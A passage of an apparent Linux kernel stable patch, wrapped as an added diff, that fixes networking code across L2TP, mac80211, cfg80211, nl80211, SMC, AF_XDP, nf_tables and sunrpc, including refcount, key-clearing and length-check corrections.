++++ b/net/l2tp/l2tp_ppp.c
+@@ -650,54 +650,22 @@ static int pppol2tp_tunnel_mtu(const struct l2tp_tunnel *tunnel)
+ 	return mtu - PPPOL2TP_HEADER_OVERHEAD;
+ }
+ 
+-/* connect() handler. Attach a PPPoX socket to a tunnel UDP socket
+- */
+-static int pppol2tp_connect(struct socket *sock, struct sockaddr *uservaddr,
+-			    int sockaddr_len, int flags)
++static struct l2tp_tunnel *pppol2tp_tunnel_get(struct net *net,
++					       const struct l2tp_connect_info *info,
++					       bool *new_tunnel)
+ {
+-	struct sock *sk = sock->sk;
+-	struct pppox_sock *po = pppox_sk(sk);
+-	struct l2tp_session *session = NULL;
+-	struct l2tp_connect_info info;
+ 	struct l2tp_tunnel *tunnel;
+-	struct pppol2tp_session *ps;
+-	struct l2tp_session_cfg cfg = { 0, };
+-	bool drop_refcnt = false;
+-	bool drop_tunnel = false;
+-	bool new_session = false;
+-	bool new_tunnel = false;
+ 	int error;
+ 
+-	error = pppol2tp_sockaddr_get_info(uservaddr, sockaddr_len, &info);
+-	if (error < 0)
+-		return error;
++	*new_tunnel = false;
+ 
+-	lock_sock(sk);
+-
+-	/* Check for already bound sockets */
+-	error = -EBUSY;
+-	if (sk->sk_state & PPPOX_CONNECTED)
+-		goto end;
+-
+-	/* We don't supporting rebinding anyway */
+-	error = -EALREADY;
+-	if (sk->sk_user_data)
+-		goto end; /* socket is already attached */
+-
+-	/* Don't bind if tunnel_id is 0 */
+-	error = -EINVAL;
+-	if (!info.tunnel_id)
+-		goto end;
+-
+-	tunnel = l2tp_tunnel_get(sock_net(sk), info.tunnel_id);
+-	if (tunnel)
+-		drop_tunnel = true;
++	tunnel = l2tp_tunnel_get(net, info->tunnel_id);
+ 
+ 	/* Special case: create tunnel context if session_id and
+ 	 * peer_session_id is 0. Otherwise look up tunnel using supplied
+ 	 * tunnel id.
+ 	 */
+-	if (!info.session_id && !info.peer_session_id) {
++	if (!info->session_id && !info->peer_session_id) {
+ 		if (!tunnel) {
+ 			struct l2tp_tunnel_cfg tcfg = {
+ 				.encap = L2TP_ENCAPTYPE_UDP,
+@@ -706,40 +674,82 @@ static int pppol2tp_connect(struct socket *sock, struct sockaddr *uservaddr,
+ 			/* Prevent l2tp_tunnel_register() from trying to set up
+ 			 * a kernel socket.
+ 			 */
+-			if (info.fd < 0) {
+-				error = -EBADF;
+-				goto end;
+-			}
++			if (info->fd < 0)
++				return ERR_PTR(-EBADF);
+ 
+-			error = l2tp_tunnel_create(info.fd,
+-						   info.version,
+-						   info.tunnel_id,
+-						   info.peer_tunnel_id, &tcfg,
++			error = l2tp_tunnel_create(info->fd,
++						   info->version,
++						   info->tunnel_id,
++						   info->peer_tunnel_id, &tcfg,
+ 						   &tunnel);
+ 			if (error < 0)
+-				goto end;
++				return ERR_PTR(error);
+ 
+ 			l2tp_tunnel_inc_refcount(tunnel);
+-			error = l2tp_tunnel_register(tunnel, sock_net(sk),
+-						     &tcfg);
++			error = l2tp_tunnel_register(tunnel, net, &tcfg);
+ 			if (error < 0) {
+ 				kfree(tunnel);
+-				goto end;
++				return ERR_PTR(error);
+ 			}
+-			drop_tunnel = true;
+-			new_tunnel = true;
++
++			*new_tunnel = true;
+ 		}
+ 	} else {
+ 		/* Error if we can't find the tunnel */
+-		error = -ENOENT;
+ 		if (!tunnel)
+-			goto end;
++			return ERR_PTR(-ENOENT);
+ 
+ 		/* Error if socket is not prepped */
+-		if (!tunnel->sock)
+-			goto end;
++		if (!tunnel->sock) {
++			l2tp_tunnel_dec_refcount(tunnel);
++			return ERR_PTR(-ENOENT);
++		}
+ 	}
+ 
++	return tunnel;
++}
++
++/* connect() handler. Attach a PPPoX socket to a tunnel UDP socket
++ */
++static int pppol2tp_connect(struct socket *sock, struct sockaddr *uservaddr,
++			    int sockaddr_len, int flags)
++{
++	struct sock *sk = sock->sk;
++	struct pppox_sock *po = pppox_sk(sk);
++	struct l2tp_session *session = NULL;
++	struct l2tp_connect_info info;
++	struct l2tp_tunnel *tunnel;
++	struct pppol2tp_session *ps;
++	struct l2tp_session_cfg cfg = { 0, };
++	bool drop_refcnt = false;
++	bool new_session = false;
++	bool new_tunnel = false;
++	int error;
++
++	error = pppol2tp_sockaddr_get_info(uservaddr, sockaddr_len, &info);
++	if (error < 0)
++		return error;
++
++	/* Don't bind if tunnel_id is 0 */
++	if (!info.tunnel_id)
++		return -EINVAL;
++
++	tunnel = pppol2tp_tunnel_get(sock_net(sk), &info, &new_tunnel);
++	if (IS_ERR(tunnel))
++		return PTR_ERR(tunnel);
++
++	lock_sock(sk);
++
++	/* Check for already bound sockets */
++	error = -EBUSY;
++	if (sk->sk_state & PPPOX_CONNECTED)
++		goto end;
++
++	/* We don't support rebinding anyway */
++	error = -EALREADY;
++	if (sk->sk_user_data)
++		goto end; /* socket is already attached */
++
+ 	if (tunnel->peer_tunnel_id == 0)
+ 		tunnel->peer_tunnel_id = info.peer_tunnel_id;
+ 
+@@ -840,8 +850,7 @@ end:
+ 	}
+ 	if (drop_refcnt)
+ 		l2tp_session_dec_refcount(session);
+-	if (drop_tunnel)
+-		l2tp_tunnel_dec_refcount(tunnel);
++	l2tp_tunnel_dec_refcount(tunnel);
+ 	release_sock(sk);
+ 
+ 	return error;
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 3c66e03774fbe..e8beec0a0ae1c 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -4623,6 +4623,20 @@ unlock:
+ 	sdata_unlock(sdata);
+ }
+ 
++void ieee80211_color_collision_detection_work(struct work_struct *work)
++{
++	struct delayed_work *delayed_work = to_delayed_work(work);
++	struct ieee80211_link_data *link =
++		container_of(delayed_work, struct ieee80211_link_data,
++			     color_collision_detect_work);
++	struct ieee80211_sub_if_data *sdata = link->sdata;
++
++	sdata_lock(sdata);
++	cfg80211_obss_color_collision_notify(sdata->dev, link->color_bitmap,
++					     GFP_KERNEL);
++	sdata_unlock(sdata);
++}
++
+ void ieee80211_color_change_finish(struct ieee80211_vif *vif)
+ {
+ 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(vif);
+@@ -4637,11 +4651,21 @@ ieeee80211_obss_color_collision_notify(struct ieee80211_vif *vif,
+ 				       u64 color_bitmap, gfp_t gfp)
+ {
+ 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(vif);
++	struct ieee80211_link_data *link = &sdata->deflink;
+ 
+ 	if (sdata->vif.bss_conf.color_change_active || sdata->vif.bss_conf.csa_active)
+ 		return;
+ 
+-	cfg80211_obss_color_collision_notify(sdata->dev, color_bitmap, gfp);
++	if (delayed_work_pending(&link->color_collision_detect_work))
++		return;
++
++	link->color_bitmap = color_bitmap;
++	/* queue the color collision detection event every 500 ms in order to
++	 * avoid sending too many netlink messages to userspace.
++	 */
++	ieee80211_queue_delayed_work(&sdata->local->hw,
++				     &link->color_collision_detect_work,
++				     msecs_to_jiffies(500));
+ }
+ EXPORT_SYMBOL_GPL(ieeee80211_obss_color_collision_notify);
+ 
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index a8862f2c64ec0..e57001e00a3d0 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -972,6 +972,8 @@ struct ieee80211_link_data {
+ 	struct cfg80211_chan_def csa_chandef;
+ 
+ 	struct work_struct color_change_finalize_work;
++	struct delayed_work color_collision_detect_work;
++	u64 color_bitmap;
+ 
+ 	/* context reservation -- protected with chanctx_mtx */
+ 	struct ieee80211_chanctx *reserved_chanctx;
+@@ -1916,6 +1918,7 @@ int ieee80211_channel_switch(struct wiphy *wiphy, struct net_device *dev,
+ 
+ /* color change handling */
+ void ieee80211_color_change_finalize_work(struct work_struct *work);
++void ieee80211_color_collision_detection_work(struct work_struct *work);
+ 
+ /* interface handling */
+ #define MAC80211_SUPPORTED_FEATURES_TX	(NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM | \
+diff --git a/net/mac80211/link.c b/net/mac80211/link.c
+index e309708abae8b..a1b3031fefce2 100644
+--- a/net/mac80211/link.c
++++ b/net/mac80211/link.c
+@@ -39,6 +39,8 @@ void ieee80211_link_init(struct ieee80211_sub_if_data *sdata,
+ 		  ieee80211_csa_finalize_work);
+ 	INIT_WORK(&link->color_change_finalize_work,
+ 		  ieee80211_color_change_finalize_work);
++	INIT_DELAYED_WORK(&link->color_collision_detect_work,
++			  ieee80211_color_collision_detection_work);
+ 	INIT_LIST_HEAD(&link->assigned_chanctx_list);
+ 	INIT_LIST_HEAD(&link->reserved_chanctx_list);
+ 	INIT_DELAYED_WORK(&link->dfs_cac_timer_work,
+@@ -66,6 +68,7 @@ void ieee80211_link_stop(struct ieee80211_link_data *link)
+ 	if (link->sdata->vif.type == NL80211_IFTYPE_STATION)
+ 		ieee80211_mgd_stop_link(link);
+ 
++	cancel_delayed_work_sync(&link->color_collision_detect_work);
+ 	ieee80211_link_release_channel(link);
+ }
+ 
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index 8f0d7c666df7e..44e407e1a14c7 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -4073,9 +4073,6 @@ static void ieee80211_invoke_rx_handlers(struct ieee80211_rx_data *rx)
+ static bool
+ ieee80211_rx_is_valid_sta_link_id(struct ieee80211_sta *sta, u8 link_id)
+ {
+-	if (!sta->mlo)
+-		return false;
+-
+ 	return !!(sta->valid_links & BIT(link_id));
+ }
+ 
+@@ -4097,13 +4094,8 @@ static bool ieee80211_rx_data_set_link(struct ieee80211_rx_data *rx,
+ }
+ 
+ static bool ieee80211_rx_data_set_sta(struct ieee80211_rx_data *rx,
+-				      struct ieee80211_sta *pubsta,
+-				      int link_id)
++				      struct sta_info *sta, int link_id)
+ {
+-	struct sta_info *sta;
+-
+-	sta = container_of(pubsta, struct sta_info, sta);
+-
+ 	rx->link_id = link_id;
+ 	rx->sta = sta;
+ 
+@@ -4141,7 +4133,7 @@ void ieee80211_release_reorder_timeout(struct sta_info *sta, int tid)
+ 	if (sta->sta.valid_links)
+ 		link_id = ffs(sta->sta.valid_links) - 1;
+ 
+-	if (!ieee80211_rx_data_set_sta(&rx, &sta->sta, link_id))
++	if (!ieee80211_rx_data_set_sta(&rx, sta, link_id))
+ 		return;
+ 
+ 	tid_agg_rx = rcu_dereference(sta->ampdu_mlme.tid_rx[tid]);
+@@ -4187,7 +4179,7 @@ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 
+ 	sta = container_of(pubsta, struct sta_info, sta);
+ 
+-	if (!ieee80211_rx_data_set_sta(&rx, pubsta, -1))
++	if (!ieee80211_rx_data_set_sta(&rx, sta, -1))
+ 		return;
+ 
+ 	rcu_read_lock();
+@@ -4864,7 +4856,8 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 		hdr = (struct ieee80211_hdr *)rx->skb->data;
+ 	}
+ 
+-	if (unlikely(rx->sta && rx->sta->sta.mlo)) {
++	if (unlikely(rx->sta && rx->sta->sta.mlo) &&
++	    is_unicast_ether_addr(hdr->addr1)) {
+ 		/* translate to MLD addresses */
+ 		if (ether_addr_equal(link->conf->addr, hdr->addr1))
+ 			ether_addr_copy(hdr->addr1, rx->sdata->vif.addr);
+@@ -4894,6 +4887,7 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb);
+ 	struct ieee80211_fast_rx *fast_rx;
+ 	struct ieee80211_rx_data rx;
++	struct sta_info *sta;
+ 	int link_id = -1;
+ 
+ 	memset(&rx, 0, sizeof(rx));
+@@ -4921,7 +4915,8 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	 * link_id is used only for stats purpose and updating the stats on
+ 	 * the deflink is fine?
+ 	 */
+-	if (!ieee80211_rx_data_set_sta(&rx, pubsta, link_id))
++	sta = container_of(pubsta, struct sta_info, sta);
++	if (!ieee80211_rx_data_set_sta(&rx, sta, link_id))
+ 		goto drop;
+ 
+ 	fast_rx = rcu_dereference(rx.sta->fast_rx);
+@@ -4961,7 +4956,7 @@ static bool ieee80211_rx_for_interface(struct ieee80211_rx_data *rx,
+ 			link_id = status->link_id;
+ 	}
+ 
+-	if (!ieee80211_rx_data_set_sta(rx, &sta->sta, link_id))
++	if (!ieee80211_rx_data_set_sta(rx, sta, link_id))
+ 		return false;
+ 
+ 	return ieee80211_prepare_and_rx_handle(rx, skb, consume);
+@@ -5028,7 +5023,8 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 			link_id = status->link_id;
+ 
+ 		if (pubsta) {
+-			if (!ieee80211_rx_data_set_sta(&rx, pubsta, link_id))
++			sta = container_of(pubsta, struct sta_info, sta);
++			if (!ieee80211_rx_data_set_sta(&rx, sta, link_id))
+ 				goto out;
+ 
+ 			/*
+@@ -5065,8 +5061,7 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 			}
+ 
+ 			rx.sdata = prev_sta->sdata;
+-			if (!ieee80211_rx_data_set_sta(&rx, &prev_sta->sta,
+-						       link_id))
++			if (!ieee80211_rx_data_set_sta(&rx, prev_sta, link_id))
+ 				goto out;
+ 
+ 			if (!status->link_valid && prev_sta->sta.mlo)
+@@ -5079,8 +5074,7 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 
+ 		if (prev_sta) {
+ 			rx.sdata = prev_sta->sdata;
+-			if (!ieee80211_rx_data_set_sta(&rx, &prev_sta->sta,
+-						       link_id))
++			if (!ieee80211_rx_data_set_sta(&rx, prev_sta, link_id))
+ 				goto out;
+ 
+ 			if (!status->link_valid && prev_sta->sta.mlo)
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index cebfd148bb406..3603cbc167570 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -2380,7 +2380,7 @@ static void sta_stats_decode_rate(struct ieee80211_local *local, u32 rate,
+ 
+ static int sta_set_rate_info_rx(struct sta_info *sta, struct rate_info *rinfo)
+ {
+-	u16 rate = READ_ONCE(sta_get_last_rx_stats(sta)->last_rate);
++	u32 rate = READ_ONCE(sta_get_last_rx_stats(sta)->last_rate);
+ 
+ 	if (rate == STA_STATS_RATE_INVALID)
+ 		return -EINVAL;
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 6409097a56c7a..6a1708db652f2 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -4395,7 +4395,7 @@ static void ieee80211_mlo_multicast_tx(struct net_device *dev,
+ 	u32 ctrl_flags = IEEE80211_TX_CTRL_MCAST_MLO_FIRST_TX;
+ 
+ 	if (hweight16(links) == 1) {
+-		ctrl_flags |= u32_encode_bits(ffs(links) - 1,
++		ctrl_flags |= u32_encode_bits(__ffs(links),
+ 					      IEEE80211_TX_CTRL_MLO_LINK);
+ 
+ 		__ieee80211_subif_start_xmit(skb, sdata->dev, 0, ctrl_flags,
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 3ba8c291fcaa7..dca5352bdf3d7 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -6951,6 +6951,9 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 			return -EOPNOTSUPP;
+ 
+ 		type = __nft_obj_type_get(objtype);
++		if (WARN_ON_ONCE(!type))
++			return -ENOENT;
++
+ 		nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+ 
+ 		return nf_tables_updobj(&ctx, type, nla[NFTA_OBJ_DATA], obj);
+diff --git a/net/rds/message.c b/net/rds/message.c
+index 9402bc941823f..f71e1237e03d4 100644
+--- a/net/rds/message.c
++++ b/net/rds/message.c
+@@ -118,7 +118,7 @@ static void rds_rm_zerocopy_callback(struct rds_sock *rs,
+ 	ck = &info->zcookies;
+ 	memset(ck, 0, sizeof(*ck));
+ 	WARN_ON(!rds_zcookie_add(info, cookie));
+-	list_add_tail(&q->zcookie_head, &info->rs_zcookie_next);
++	list_add_tail(&info->rs_zcookie_next, &q->zcookie_head);
+ 
+ 	spin_unlock_irqrestore(&q->lock, flags);
+ 	/* caller invokes rds_wake_sk_sleep() */
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index e12d4fa5aece6..d9413d43b1045 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -1826,8 +1826,10 @@ static int smcr_serv_conf_first_link(struct smc_sock *smc)
+ 	smc_llc_link_active(link);
+ 	smcr_lgr_set_type(link->lgr, SMC_LGR_SINGLE);
+ 
++	mutex_lock(&link->lgr->llc_conf_mutex);
+ 	/* initial contact - try to establish second link */
+ 	smc_llc_srv_add_link(link, NULL);
++	mutex_unlock(&link->lgr->llc_conf_mutex);
+ 	return 0;
+ }
+ 
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index c305d8dd23f80..c19d4b7c1f28a 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -1120,8 +1120,9 @@ static void smcr_buf_unuse(struct smc_buf_desc *buf_desc, bool is_rmb,
+ 
+ 		smc_buf_free(lgr, is_rmb, buf_desc);
+ 	} else {
+-		buf_desc->used = 0;
+-		memset(buf_desc->cpu_addr, 0, buf_desc->len);
++		/* memzero_explicit provides potential memory barrier semantics */
++		memzero_explicit(buf_desc->cpu_addr, buf_desc->len);
++		WRITE_ONCE(buf_desc->used, 0);
+ 	}
+ }
+ 
+@@ -1132,19 +1133,17 @@ static void smc_buf_unuse(struct smc_connection *conn,
+ 		if (!lgr->is_smcd && conn->sndbuf_desc->is_vm) {
+ 			smcr_buf_unuse(conn->sndbuf_desc, false, lgr);
+ 		} else {
+-			conn->sndbuf_desc->used = 0;
+-			memset(conn->sndbuf_desc->cpu_addr, 0,
+-			       conn->sndbuf_desc->len);
++			memzero_explicit(conn->sndbuf_desc->cpu_addr, conn->sndbuf_desc->len);
++			WRITE_ONCE(conn->sndbuf_desc->used, 0);
+ 		}
+ 	}
+ 	if (conn->rmb_desc) {
+ 		if (!lgr->is_smcd) {
+ 			smcr_buf_unuse(conn->rmb_desc, true, lgr);
+ 		} else {
+-			conn->rmb_desc->used = 0;
+-			memset(conn->rmb_desc->cpu_addr, 0,
+-			       conn->rmb_desc->len +
+-			       sizeof(struct smcd_cdc_msg));
++			memzero_explicit(conn->rmb_desc->cpu_addr,
++					 conn->rmb_desc->len + sizeof(struct smcd_cdc_msg));
++			WRITE_ONCE(conn->rmb_desc->used, 0);
+ 		}
+ 	}
+ }
+diff --git a/net/socket.c b/net/socket.c
+index 29a4bad1b1d81..577079a8935fa 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -449,7 +449,9 @@ static struct file_system_type sock_fs_type = {
+  *
+  *	Returns the &file bound with @sock, implicitly storing it
+  *	in sock->file. If dname is %NULL, sets to "".
+- *	On failure the return is a ERR pointer (see linux/err.h).
++ *
++ *	On failure @sock is released, and an ERR pointer is returned.
++ *
+  *	This function uses GFP_KERNEL internally.
+  */
+ 
+@@ -1613,7 +1615,6 @@ static struct socket *__sys_socket_create(int family, int type, int protocol)
+ struct file *__sys_socket_file(int family, int type, int protocol)
+ {
+ 	struct socket *sock;
+-	struct file *file;
+ 	int flags;
+ 
+ 	sock = __sys_socket_create(family, type, protocol);
+@@ -1624,11 +1625,7 @@ struct file *__sys_socket_file(int family, int type, int protocol)
+ 	if (SOCK_NONBLOCK != O_NONBLOCK && (flags & SOCK_NONBLOCK))
+ 		flags = (flags & ~SOCK_NONBLOCK) | O_NONBLOCK;
+ 
+-	file = sock_alloc_file(sock, flags, NULL);
+-	if (IS_ERR(file))
+-		sock_release(sock);
+-
+-	return file;
++	return sock_alloc_file(sock, flags, NULL);
+ }
+ 
+ int __sys_socket(int family, int type, int protocol)
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index 0b0b9f1eed469..fd7e1c630493e 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -3350,6 +3350,8 @@ rpc_clnt_swap_deactivate_callback(struct rpc_clnt *clnt,
+ void
+ rpc_clnt_swap_deactivate(struct rpc_clnt *clnt)
+ {
++	while (clnt != clnt->cl_parent)
++		clnt = clnt->cl_parent;
+ 	if (atomic_dec_if_positive(&clnt->cl_swapper) == 0)
+ 		rpc_clnt_iterate_for_each_xprt(clnt,
+ 				rpc_clnt_swap_deactivate_callback, NULL);
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index d2321c6833985..4d4de49f7ab65 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -13808,7 +13808,7 @@ static int nl80211_set_rekey_data(struct sk_buff *skb, struct genl_info *info)
+ 		return -ERANGE;
+ 	if (nla_len(tb[NL80211_REKEY_DATA_KCK]) != NL80211_KCK_LEN &&
+ 	    !(rdev->wiphy.flags & WIPHY_FLAG_SUPPORTS_EXT_KEK_KCK &&
+-	      nla_len(tb[NL80211_REKEY_DATA_KEK]) == NL80211_KCK_EXT_LEN))
++	      nla_len(tb[NL80211_REKEY_DATA_KCK]) == NL80211_KCK_EXT_LEN))
+ 		return -ERANGE;
+ 
+ 	rekey_data.kek = nla_data(tb[NL80211_REKEY_DATA_KEK]);
+diff --git a/net/wireless/sme.c b/net/wireless/sme.c
+index d513536617bd9..89fc5683ed26c 100644
+--- a/net/wireless/sme.c
++++ b/net/wireless/sme.c
+@@ -285,6 +285,15 @@ void cfg80211_conn_work(struct work_struct *work)
+ 	wiphy_unlock(&rdev->wiphy);
+ }
+ 
++static void cfg80211_step_auth_next(struct cfg80211_conn *conn,
++				    struct cfg80211_bss *bss)
++{
++	memcpy(conn->bssid, bss->bssid, ETH_ALEN);
++	conn->params.bssid = conn->bssid;
++	conn->params.channel = bss->channel;
++	conn->state = CFG80211_CONN_AUTHENTICATE_NEXT;
++}
++
+ /* Returned bss is reference counted and must be cleaned up appropriately. */
+ static struct cfg80211_bss *cfg80211_get_conn_bss(struct wireless_dev *wdev)
+ {
+@@ -302,10 +311,7 @@ static struct cfg80211_bss *cfg80211_get_conn_bss(struct wireless_dev *wdev)
+ 	if (!bss)
+ 		return NULL;
+ 
+-	memcpy(wdev->conn->bssid, bss->bssid, ETH_ALEN);
+-	wdev->conn->params.bssid = wdev->conn->bssid;
+-	wdev->conn->params.channel = bss->channel;
+-	wdev->conn->state = CFG80211_CONN_AUTHENTICATE_NEXT;
++	cfg80211_step_auth_next(wdev->conn, bss);
+ 	schedule_work(&rdev->conn_work);
+ 
+ 	return bss;
+@@ -597,7 +603,12 @@ static int cfg80211_sme_connect(struct wireless_dev *wdev,
+ 	wdev->conn->params.ssid_len = wdev->u.client.ssid_len;
+ 
+ 	/* see if we have the bss already */
+-	bss = cfg80211_get_conn_bss(wdev);
++	bss = cfg80211_get_bss(wdev->wiphy, wdev->conn->params.channel,
++			       wdev->conn->params.bssid,
++			       wdev->conn->params.ssid,
++			       wdev->conn->params.ssid_len,
++			       wdev->conn_bss_type,
++			       IEEE80211_PRIVACY(wdev->conn->params.privacy));
+ 
+ 	if (prev_bssid) {
+ 		memcpy(wdev->conn->prev_bssid, prev_bssid, ETH_ALEN);
+@@ -608,6 +619,7 @@ static int cfg80211_sme_connect(struct wireless_dev *wdev,
+ 	if (bss) {
+ 		enum nl80211_timeout_reason treason;
+ 
++		cfg80211_step_auth_next(wdev->conn, bss);
+ 		err = cfg80211_conn_do_work(wdev, &treason);
+ 		cfg80211_put_bss(wdev->wiphy, bss);
+ 	} else {
+@@ -724,6 +736,7 @@ void __cfg80211_connect_result(struct net_device *dev,
+ {
+ 	struct wireless_dev *wdev = dev->ieee80211_ptr;
+ 	const struct element *country_elem = NULL;
++	const struct element *ssid;
+ 	const u8 *country_data;
+ 	u8 country_datalen;
+ #ifdef CONFIG_CFG80211_WEXT
+@@ -869,6 +882,22 @@ void __cfg80211_connect_result(struct net_device *dev,
+ 				   country_data, country_datalen);
+ 	kfree(country_data);
+ 
++	if (!wdev->u.client.ssid_len) {
++		rcu_read_lock();
++		for_each_valid_link(cr, link) {
++			ssid = ieee80211_bss_get_elem(cr->links[link].bss,
++						      WLAN_EID_SSID);
++
++			if (!ssid || !ssid->datalen)
++				continue;
++
++			memcpy(wdev->u.client.ssid, ssid->data, ssid->datalen);
++			wdev->u.client.ssid_len = ssid->datalen;
++			break;
++		}
++		rcu_read_unlock();
++	}
++
+ 	return;
+ out:
+ 	for_each_valid_link(cr, link)
+@@ -1450,6 +1479,15 @@ int cfg80211_connect(struct cfg80211_registered_device *rdev,
+ 	} else {
+ 		if (WARN_ON(connkeys))
+ 			return -EINVAL;
++
++		/* connect can point to wdev->wext.connect which
++		 * can hold key data from a previous connection
++		 */
++		connect->key = NULL;
++		connect->key_len = 0;
++		connect->key_idx = 0;
++		connect->crypto.cipher_group = 0;
++		connect->crypto.n_ciphers_pairwise = 0;
+ 	}
+ 
+ 	wdev->connect_keys = connkeys;
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index 9f0561b67c12e..13f62d2402e71 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -511,7 +511,7 @@ static struct sk_buff *xsk_build_skb(struct xdp_sock *xs,
+ 	return skb;
+ }
+ 
+-static int xsk_generic_xmit(struct sock *sk)
++static int __xsk_generic_xmit(struct sock *sk)
+ {
+ 	struct xdp_sock *xs = xdp_sk(sk);
+ 	u32 max_batch = TX_BATCH_SIZE;
+@@ -594,22 +594,13 @@ out:
+ 	return err;
+ }
+ 
+-static int xsk_xmit(struct sock *sk)
++static int xsk_generic_xmit(struct sock *sk)
+ {
+-	struct xdp_sock *xs = xdp_sk(sk);
+ 	int ret;
+ 
+-	if (unlikely(!(xs->dev->flags & IFF_UP)))
+-		return -ENETDOWN;
+-	if (unlikely(!xs->tx))
+-		return -ENOBUFS;
+-
+-	if (xs->zc)
+-		return xsk_wakeup(xs, XDP_WAKEUP_TX);
+-
+ 	/* Drop the RCU lock since the SKB path might sleep. */
+ 	rcu_read_unlock();
+-	ret = xsk_generic_xmit(sk);
++	ret = __xsk_generic_xmit(sk);
+ 	/* Reaquire RCU lock before going into common code. */
+ 	rcu_read_lock();
+ 
+@@ -627,17 +618,31 @@ static bool xsk_no_wakeup(struct sock *sk)
+ #endif
+ }
+ 
++static int xsk_check_common(struct xdp_sock *xs)
++{
++	if (unlikely(!xsk_is_bound(xs)))
++		return -ENXIO;
++	if (unlikely(!(xs->dev->flags & IFF_UP)))
++		return -ENETDOWN;
++
++	return 0;
++}
++
+ static int __xsk_sendmsg(struct socket *sock, struct msghdr *m, size_t total_len)
+ {
+ 	bool need_wait = !(m->msg_flags & MSG_DONTWAIT);
+ 	struct sock *sk = sock->sk;
+ 	struct xdp_sock *xs = xdp_sk(sk);
+ 	struct xsk_buff_pool *pool;
++	int err;
+ 
+-	if (unlikely(!xsk_is_bound(xs)))
+-		return -ENXIO;
++	err = xsk_check_common(xs);
++	if (err)
++		return err;
+ 	if (unlikely(need_wait))
+ 		return -EOPNOTSUPP;
++	if (unlikely(!xs->tx))
++		return -ENOBUFS;
+ 
+ 	if (sk_can_busy_loop(sk)) {
+ 		if (xs->zc)
+@@ -649,8 +654,11 @@ static int __xsk_sendmsg(struct socket *sock, struct msghdr *m, size_t total_len
+ 		return 0;
+ 
+ 	pool = xs->pool;
+-	if (pool->cached_need_wakeup & XDP_WAKEUP_TX)
+-		return xsk_xmit(sk);
++	if (pool->cached_need_wakeup & XDP_WAKEUP_TX) {
++		if (xs->zc)
++			return xsk_wakeup(xs, XDP_WAKEUP_TX);
++		return xsk_generic_xmit(sk);
++	}
+ 	return 0;
+ }
+ 
+@@ -670,11 +678,11 @@ static int __xsk_recvmsg(struct socket *sock, struct msghdr *m, size_t len, int
+ 	bool need_wait = !(flags & MSG_DONTWAIT);
+ 	struct sock *sk = sock->sk;
+ 	struct xdp_sock *xs = xdp_sk(sk);
++	int err;
+ 
+-	if (unlikely(!xsk_is_bound(xs)))
+-		return -ENXIO;
+-	if (unlikely(!(xs->dev->flags & IFF_UP)))
+-		return -ENETDOWN;
++	err = xsk_check_common(xs);
++	if (err)
++		return err;
+ 	if (unlikely(!xs->rx))
+ 		return -ENOBUFS;
+ 	if (unlikely(need_wait))
+@@ -713,21 +721,20 @@ static __poll_t xsk_poll(struct file *file, struct socket *sock,
+ 	sock_poll_wait(file, sock, wait);
+ 
+ 	rcu_read_lock();
+-	if (unlikely(!xsk_is_bound(xs))) {
+-		rcu_read_unlock();
+-		return mask;
+-	}
++	if (xsk_check_common(xs))
++		goto skip_tx;
+ 
+ 	pool = xs->pool;
+ 
+ 	if (pool->cached_need_wakeup) {
+ 		if (xs->zc)
+ 			xsk_wakeup(xs, pool->cached_need_wakeup);
+-		else
++		else if (xs->tx)
+ 			/* Poll needs to drive Tx also in copy mode */
+-			xsk_xmit(sk);
++			xsk_generic_xmit(sk);
+ 	}
+ 
++skip_tx:
+ 	if (xs->rx && !xskq_prod_is_empty(xs->rx))
+ 		mask |= EPOLLIN | EPOLLRDNORM;
+ 	if (xs->tx && xsk_tx_writeable(xs))
+diff --git a/scripts/gcc-plugins/Makefile b/scripts/gcc-plugins/Makefile
+index b34d11e226366..320afd3cf8e82 100644
+--- a/scripts/gcc-plugins/Makefile
++++ b/scripts/gcc-plugins/Makefile
+@@ -29,7 +29,7 @@ GCC_PLUGINS_DIR = $(shell $(CC) -print-file-name=plugin)
